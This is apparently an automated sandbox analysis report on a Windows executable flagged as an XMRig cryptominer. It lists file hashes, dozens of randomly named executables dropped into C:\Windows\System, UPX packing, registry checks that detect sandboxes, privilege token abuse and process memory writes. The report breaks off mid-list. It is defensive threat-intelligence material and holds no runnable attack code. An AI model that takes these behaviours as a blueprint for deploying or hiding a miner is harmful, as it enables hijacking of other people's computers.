Analysis
-
max time kernel
104s -
max time network
98s -
platform
windows10-2004_x64 -
resource
win10v2004-20240426-en -
resource tags
arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system -
submitted
27-04-2024 22:35
Behavioral task
behavioral1
Sample
03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe
Resource
win7-20240221-en
General
-
Target
03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe
-
Size
1.9MB
-
MD5
03c7e7e8016bcb72c69cf85052f2a180
-
SHA1
d845d9e1408e2507176df706e99aa7fe84b7f0c0
-
SHA256
904a878e7b0a066e0bf9ba76400a35c9d18aa5d2d7cb9a3bcc115a11298479a2
-
SHA512
2f0c0454cc3e384301f9a0416f17106e4223796b848a2d38da8c1d95b8f4ebf37895ee56bf48054a30ebe873573d01ce87e85a1b90a94c7fa8a2f5e31f3b9d74
-
SSDEEP
49152:Lz071uv4BPMkibTIA5sf6r+WVc2HhG82SflDrl/S:NABH
Malware Config
Signatures
-
XMRig Miner payload 42 IoCs
Processes:
resource yara_rule behavioral2/memory/1080-30-0x00007FF79CB50000-0x00007FF79CF42000-memory.dmp xmrig behavioral2/memory/456-85-0x00007FF67ED00000-0x00007FF67F0F2000-memory.dmp xmrig behavioral2/memory/3500-94-0x00007FF6110B0000-0x00007FF6114A2000-memory.dmp xmrig behavioral2/memory/2372-335-0x00007FF61CDD0000-0x00007FF61D1C2000-memory.dmp xmrig behavioral2/memory/1584-354-0x00007FF7D5500000-0x00007FF7D58F2000-memory.dmp xmrig behavioral2/memory/1048-357-0x00007FF64DF80000-0x00007FF64E372000-memory.dmp xmrig behavioral2/memory/4112-362-0x00007FF71B600000-0x00007FF71B9F2000-memory.dmp xmrig behavioral2/memory/5004-353-0x00007FF78AE50000-0x00007FF78B242000-memory.dmp xmrig behavioral2/memory/3960-346-0x00007FF67A100000-0x00007FF67A4F2000-memory.dmp xmrig behavioral2/memory/4708-327-0x00007FF719520000-0x00007FF719912000-memory.dmp xmrig behavioral2/memory/2144-101-0x00007FF672E00000-0x00007FF6731F2000-memory.dmp xmrig behavioral2/memory/1240-98-0x00007FF64CD00000-0x00007FF64D0F2000-memory.dmp xmrig behavioral2/memory/424-97-0x00007FF612080000-0x00007FF612472000-memory.dmp xmrig behavioral2/memory/1608-93-0x00007FF629E40000-0x00007FF62A232000-memory.dmp xmrig behavioral2/memory/2668-88-0x00007FF6112D0000-0x00007FF6116C2000-memory.dmp xmrig behavioral2/memory/4996-74-0x00007FF720AC0000-0x00007FF720EB2000-memory.dmp xmrig behavioral2/memory/2104-62-0x00007FF76D040000-0x00007FF76D432000-memory.dmp xmrig behavioral2/memory/3888-28-0x00007FF640370000-0x00007FF640762000-memory.dmp xmrig behavioral2/memory/920-2608-0x00007FF7C4BD0000-0x00007FF7C4FC2000-memory.dmp xmrig behavioral2/memory/1544-2609-0x00007FF720300000-0x00007FF7206F2000-memory.dmp xmrig behavioral2/memory/2308-2610-0x00007FF7D3C00000-0x00007FF7D3FF2000-memory.dmp xmrig behavioral2/memory/1080-2665-0x00007FF79CB50000-0x00007FF79CF42000-memory.dmp xmrig behavioral2/memory/3888-2667-0x00007FF640370000-0x00007FF640762000-memory.dmp xmrig behavioral2/memory/2104-2669-0x00007FF76D040000-0x00007FF76D432000-memory.dmp xmrig behavioral2/memory/920-2671-0x00007FF7C4BD0000-0x00007FF7C4FC2000-memory.dmp xmrig behavioral2/memory/1544-2673-0x00007FF720300000-0x00007FF7206F2000-memory.dmp xmrig behavioral2/memory/1608-2675-0x00007FF629E40000-0x00007FF62A232000-memory.dmp xmrig behavioral2/memory/4996-2677-0x00007FF720AC0000-0x00007FF720EB2000-memory.dmp xmrig behavioral2/memory/456-2679-0x00007FF67ED00000-0x00007FF67F0F2000-memory.dmp xmrig behavioral2/memory/2668-2681-0x00007FF6112D0000-0x00007FF6116C2000-memory.dmp xmrig behavioral2/memory/424-2685-0x00007FF612080000-0x00007FF612472000-memory.dmp xmrig behavioral2/memory/3500-2687-0x00007FF6110B0000-0x00007FF6114A2000-memory.dmp xmrig behavioral2/memory/1240-2683-0x00007FF64CD00000-0x00007FF64D0F2000-memory.dmp xmrig behavioral2/memory/2308-2691-0x00007FF7D3C00000-0x00007FF7D3FF2000-memory.dmp xmrig behavioral2/memory/2144-2690-0x00007FF672E00000-0x00007FF6731F2000-memory.dmp xmrig behavioral2/memory/4708-2693-0x00007FF719520000-0x00007FF719912000-memory.dmp xmrig behavioral2/memory/2372-2695-0x00007FF61CDD0000-0x00007FF61D1C2000-memory.dmp xmrig behavioral2/memory/3960-2697-0x00007FF67A100000-0x00007FF67A4F2000-memory.dmp xmrig behavioral2/memory/5004-2699-0x00007FF78AE50000-0x00007FF78B242000-memory.dmp xmrig behavioral2/memory/1584-2701-0x00007FF7D5500000-0x00007FF7D58F2000-memory.dmp xmrig behavioral2/memory/4112-2710-0x00007FF71B600000-0x00007FF71B9F2000-memory.dmp xmrig behavioral2/memory/1048-2708-0x00007FF64DF80000-0x00007FF64E372000-memory.dmp xmrig -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 3 2076 powershell.exe 5 2076 powershell.exe -
Executes dropped EXE 64 IoCs
Processes:
EPzdxmJ.exelEphIFM.exeNLmhtHW.exeGaDeUOV.exeFCIlfiz.exePpQLMbf.exeaLVJRel.exekniHjbz.exeMZBDbbn.exeYCWAzCK.exeYCQPCkW.exeoJKZSaj.exexlaKyRL.exeiMwOmKV.exeDJSRmCJ.exeuqbIoDo.exeILxUQZF.exeoctEPVJ.exeihFXJbC.exeSrKvmVn.exeZvONovo.exedtAAipU.exeNPFhJtL.exenkRiAVH.exejSBHmVm.exepdYcMdK.exeuWZnljm.exeZjuDlfz.exeRllVBWv.exegevnQJc.exeEGLkfBq.exedJwAbiB.exeKcDVBgi.exezQlwXPb.exeRJrOYjV.exeRwcUjTt.exesFaXCeW.exekFKhBGU.exeQaBgSKa.exeMLUtovq.exesWHvpHa.exeZPsUxhc.exezEVFhGx.execocwQFb.exewxtPVCw.exexEvPYbG.exexewRAKe.exeeJOHVru.exeaCihzoy.exebAYIqay.exeTNzCBDg.exeSsStims.exeyWRcpSb.exeBzvCewk.exeBXZNMVK.exeXsrhVBQ.exeSXVeist.exeLpilbuL.exexWaMUHI.exelemBfVQ.exejdonHqO.exeeYJwEDu.exelIVltdz.exejHFcuUK.exepid process 1080 EPzdxmJ.exe 3888 lEphIFM.exe 920 NLmhtHW.exe 1544 GaDeUOV.exe 2104 FCIlfiz.exe 1608 PpQLMbf.exe 4996 aLVJRel.exe 456 kniHjbz.exe 2668 MZBDbbn.exe 3500 YCWAzCK.exe 424 YCQPCkW.exe 1240 oJKZSaj.exe 2308 xlaKyRL.exe 2144 iMwOmKV.exe 4708 DJSRmCJ.exe 2372 uqbIoDo.exe 3960 ILxUQZF.exe 5004 octEPVJ.exe 1584 ihFXJbC.exe 1048 SrKvmVn.exe 4112 ZvONovo.exe 1476 dtAAipU.exe 1612 NPFhJtL.exe 2316 nkRiAVH.exe 1744 jSBHmVm.exe 4504 pdYcMdK.exe 3228 uWZnljm.exe 4104 ZjuDlfz.exe 1036 RllVBWv.exe 1120 gevnQJc.exe 2576 EGLkfBq.exe 916 dJwAbiB.exe 3648 KcDVBgi.exe 1592 zQlwXPb.exe 4752 RJrOYjV.exe 388 RwcUjTt.exe 3424 sFaXCeW.exe 4672 kFKhBGU.exe 3576 QaBgSKa.exe 572 MLUtovq.exe 4028 sWHvpHa.exe 1160 ZPsUxhc.exe 4644 zEVFhGx.exe 3276 cocwQFb.exe 4512 wxtPVCw.exe 2236 xEvPYbG.exe 4964 xewRAKe.exe 2352 eJOHVru.exe 4832 aCihzoy.exe 3852 bAYIqay.exe 1772 TNzCBDg.exe 2832 SsStims.exe 4588 yWRcpSb.exe 1132 BzvCewk.exe 3704 BXZNMVK.exe 3620 XsrhVBQ.exe 1932 SXVeist.exe 4144 LpilbuL.exe 1964 xWaMUHI.exe 2940 lemBfVQ.exe 4088 jdonHqO.exe 3968 eYJwEDu.exe 3132 lIVltdz.exe 3824 jHFcuUK.exe -
Processes:
resource yara_rule behavioral2/memory/1792-0-0x00007FF782DD0000-0x00007FF7831C2000-memory.dmp upx C:\Windows\System\EPzdxmJ.exe upx C:\Windows\System\lEphIFM.exe upx C:\Windows\System\NLmhtHW.exe upx behavioral2/memory/1080-30-0x00007FF79CB50000-0x00007FF79CF42000-memory.dmp upx C:\Windows\System\kniHjbz.exe upx C:\Windows\System\MZBDbbn.exe upx C:\Windows\System\YCWAzCK.exe upx C:\Windows\System\YCQPCkW.exe upx behavioral2/memory/456-85-0x00007FF67ED00000-0x00007FF67F0F2000-memory.dmp upx behavioral2/memory/2308-92-0x00007FF7D3C00000-0x00007FF7D3FF2000-memory.dmp upx behavioral2/memory/3500-94-0x00007FF6110B0000-0x00007FF6114A2000-memory.dmp upx C:\Windows\System\DJSRmCJ.exe upx C:\Windows\System\ILxUQZF.exe upx C:\Windows\System\dtAAipU.exe upx C:\Windows\System\nkRiAVH.exe upx C:\Windows\System\uWZnljm.exe upx C:\Windows\System\gevnQJc.exe upx behavioral2/memory/2372-335-0x00007FF61CDD0000-0x00007FF61D1C2000-memory.dmp upx behavioral2/memory/1584-354-0x00007FF7D5500000-0x00007FF7D58F2000-memory.dmp upx behavioral2/memory/1048-357-0x00007FF64DF80000-0x00007FF64E372000-memory.dmp upx behavioral2/memory/4112-362-0x00007FF71B600000-0x00007FF71B9F2000-memory.dmp upx behavioral2/memory/5004-353-0x00007FF78AE50000-0x00007FF78B242000-memory.dmp upx behavioral2/memory/3960-346-0x00007FF67A100000-0x00007FF67A4F2000-memory.dmp upx behavioral2/memory/4708-327-0x00007FF719520000-0x00007FF719912000-memory.dmp upx C:\Windows\System\KcDVBgi.exe upx C:\Windows\System\EGLkfBq.exe upx C:\Windows\System\dJwAbiB.exe upx C:\Windows\System\RllVBWv.exe upx C:\Windows\System\ZjuDlfz.exe upx C:\Windows\System\pdYcMdK.exe upx C:\Windows\System\jSBHmVm.exe upx C:\Windows\System\NPFhJtL.exe upx C:\Windows\System\ZvONovo.exe upx C:\Windows\System\SrKvmVn.exe upx C:\Windows\System\ihFXJbC.exe upx C:\Windows\System\octEPVJ.exe upx C:\Windows\System\uqbIoDo.exe upx behavioral2/memory/2144-101-0x00007FF672E00000-0x00007FF6731F2000-memory.dmp upx behavioral2/memory/1240-98-0x00007FF64CD00000-0x00007FF64D0F2000-memory.dmp upx behavioral2/memory/424-97-0x00007FF612080000-0x00007FF612472000-memory.dmp upx behavioral2/memory/1608-93-0x00007FF629E40000-0x00007FF62A232000-memory.dmp upx C:\Windows\System\iMwOmKV.exe upx C:\Windows\System\xlaKyRL.exe upx behavioral2/memory/2668-88-0x00007FF6112D0000-0x00007FF6116C2000-memory.dmp upx C:\Windows\System\oJKZSaj.exe upx behavioral2/memory/4996-74-0x00007FF720AC0000-0x00007FF720EB2000-memory.dmp upx C:\Windows\System\aLVJRel.exe upx C:\Windows\System\PpQLMbf.exe upx behavioral2/memory/2104-62-0x00007FF76D040000-0x00007FF76D432000-memory.dmp upx C:\Windows\System\GaDeUOV.exe upx behavioral2/memory/1544-45-0x00007FF720300000-0x00007FF7206F2000-memory.dmp upx C:\Windows\System\FCIlfiz.exe upx behavioral2/memory/920-37-0x00007FF7C4BD0000-0x00007FF7C4FC2000-memory.dmp upx behavioral2/memory/3888-28-0x00007FF640370000-0x00007FF640762000-memory.dmp upx behavioral2/memory/920-2608-0x00007FF7C4BD0000-0x00007FF7C4FC2000-memory.dmp upx behavioral2/memory/1544-2609-0x00007FF720300000-0x00007FF7206F2000-memory.dmp upx behavioral2/memory/2308-2610-0x00007FF7D3C00000-0x00007FF7D3FF2000-memory.dmp upx behavioral2/memory/1080-2665-0x00007FF79CB50000-0x00007FF79CF42000-memory.dmp upx behavioral2/memory/3888-2667-0x00007FF640370000-0x00007FF640762000-memory.dmp upx behavioral2/memory/2104-2669-0x00007FF76D040000-0x00007FF76D432000-memory.dmp upx behavioral2/memory/920-2671-0x00007FF7C4BD0000-0x00007FF7C4FC2000-memory.dmp upx behavioral2/memory/1544-2673-0x00007FF720300000-0x00007FF7206F2000-memory.dmp upx behavioral2/memory/1608-2675-0x00007FF629E40000-0x00007FF62A232000-memory.dmp upx -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Drops file in Windows directory 64 IoCs
Processes:
03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exedescription ioc process File created C:\Windows\System\sAXgHqQ.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\qFNhSoK.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\RIdfIZZ.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\hphsbhW.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\FfSBPGO.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\dlxQglf.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\QtfhCnE.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\xwSukKs.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\sazWwMd.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\sEcKDVU.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\EuwfQuO.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\KNBUsGS.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\RphSDDK.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\VsrjsEK.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\ZYWsClU.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\WWwDZii.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\VSnroWp.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\UXsggxN.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\nfohsiF.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\fnFwYWH.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\ywXQpQv.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\RQauZuC.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\Zvheuzo.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\rhgRyCL.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\GJmspTX.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\IamFUrN.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\QdRZetz.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\VtvqSwI.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\PqGxKYu.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\GNLUYiy.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\YllRteP.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\AvgfXZB.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\oYJbNYP.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\vKAisxl.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\WoSlEml.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\yPADulo.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\yqfNECy.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\QcnLYsq.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\bBwEzLD.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\pPaOMWF.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\XsjhGEX.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\BnfzGXc.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\rCmgujf.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\kfDPoLA.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\CAfuZnK.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\qaRdBJu.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\qFAgaxO.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\SaHYWYj.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\gnCIkcX.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\lMsKEHq.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\BHOgDYh.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\qblvRSV.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\GbPSjyZ.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\SsStims.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\cJkiDTA.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\wzgbfTv.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\dkgguZg.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\fnHJGLN.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\IIWbtZH.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\brMKfhV.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\SlTQMNV.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\wRDMiiN.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\RcCAaKg.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe File created C:\Windows\System\MyvoQQW.exe 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe -
Checks SCSI registry key(s) 3 TTPs 6 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
dwm.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_QEMU&PROD_QEMU_DVD-ROM\4&215468A5&0&010000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags dwm.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\HardwareID dwm.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID dwm.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
wermgr.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz wermgr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wermgr.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
Processes:
wermgr.exedwm.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU wermgr.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS dwm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU dwm.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS wermgr.exe -
Modifies data under HKEY_USERS 18 IoCs
Processes:
dwm.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2a\52C64B7E dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA dwm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople dwm.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 2076 powershell.exe 2076 powershell.exe -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exepowershell.exedwm.exedescription pid process Token: SeLockMemoryPrivilege 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe Token: SeDebugPrivilege 2076 powershell.exe Token: SeLockMemoryPrivilege 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe Token: SeCreateGlobalPrivilege 3404 dwm.exe Token: SeChangeNotifyPrivilege 3404 dwm.exe Token: 33 3404 dwm.exe Token: SeIncBasePriorityPrivilege 3404 dwm.exe Token: SeShutdownPrivilege 3404 dwm.exe Token: SeCreatePagefilePrivilege 3404 dwm.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exedescription pid process target process PID 1792 wrote to memory of 2076 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe powershell.exe PID 1792 wrote to memory of 2076 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe powershell.exe PID 1792 wrote to memory of 1080 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe EPzdxmJ.exe PID 1792 wrote to memory of 1080 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe EPzdxmJ.exe PID 1792 wrote to memory of 3888 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe lEphIFM.exe PID 1792 wrote to memory of 3888 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe lEphIFM.exe PID 1792 wrote to memory of 920 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe NLmhtHW.exe PID 1792 wrote to memory of 920 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe NLmhtHW.exe PID 1792 wrote to memory of 1544 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe GaDeUOV.exe PID 1792 wrote to memory of 1544 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe GaDeUOV.exe PID 1792 wrote to memory of 2104 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe FCIlfiz.exe PID 1792 wrote to memory of 2104 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe FCIlfiz.exe PID 1792 wrote to memory of 1608 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe PpQLMbf.exe PID 1792 wrote to memory of 1608 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe PpQLMbf.exe PID 1792 wrote to memory of 4996 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe aLVJRel.exe PID 1792 wrote to memory of 4996 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe aLVJRel.exe PID 1792 wrote to memory of 456 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe kniHjbz.exe PID 1792 wrote to memory of 456 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe kniHjbz.exe PID 1792 wrote to memory of 2668 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe MZBDbbn.exe PID 1792 wrote to memory of 2668 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe MZBDbbn.exe PID 1792 wrote to memory of 3500 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe YCWAzCK.exe PID 1792 wrote to memory of 3500 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe YCWAzCK.exe PID 1792 wrote to memory of 424 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe YCQPCkW.exe PID 1792 wrote to memory of 424 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe YCQPCkW.exe PID 1792 wrote to memory of 1240 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe oJKZSaj.exe PID 1792 wrote to memory of 1240 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe oJKZSaj.exe PID 1792 wrote to memory of 2308 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe xlaKyRL.exe PID 1792 wrote to memory of 2308 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe xlaKyRL.exe PID 1792 wrote to memory of 2144 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe iMwOmKV.exe PID 1792 wrote to memory of 2144 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe iMwOmKV.exe PID 1792 wrote to memory of 4708 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe DJSRmCJ.exe PID 1792 wrote to memory of 4708 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe DJSRmCJ.exe PID 1792 wrote to memory of 2372 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe uqbIoDo.exe PID 1792 wrote to memory of 2372 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe uqbIoDo.exe PID 1792 wrote to memory of 3960 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe ILxUQZF.exe PID 1792 wrote to memory of 3960 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe ILxUQZF.exe PID 1792 wrote to memory of 5004 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe octEPVJ.exe PID 1792 wrote to memory of 5004 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe octEPVJ.exe PID 1792 wrote to memory of 1584 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe ihFXJbC.exe PID 1792 wrote to memory of 1584 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe ihFXJbC.exe PID 1792 wrote to memory of 1048 1792 03c7e7e8016bcb72c69cf85052f2a180_JaffaCakes118.exe SrKvmVn.exe PID 1792 wrote to memory of 